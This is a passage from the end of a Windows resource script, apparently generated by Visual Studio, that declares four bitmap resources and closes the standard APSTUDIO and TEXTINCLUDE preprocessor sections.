        RIGHTMARGIN, 170
        TOPMARGIN, 7
        BOTTOMMARGIN, 151
    END
END
#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Bitmap
//

IDB_BITMAP1             BITMAP                  "bitmap1.bmp"
IDB_BITMAP2             BITMAP                  "bitmap2.bmp"
IDB_BITMAP3             BITMAP                  "bitmap3.bmp"
IDB_BITMAP4             BITMAP                  "bitmap4.bmp"
#endif    // English (U.S.) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//


/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

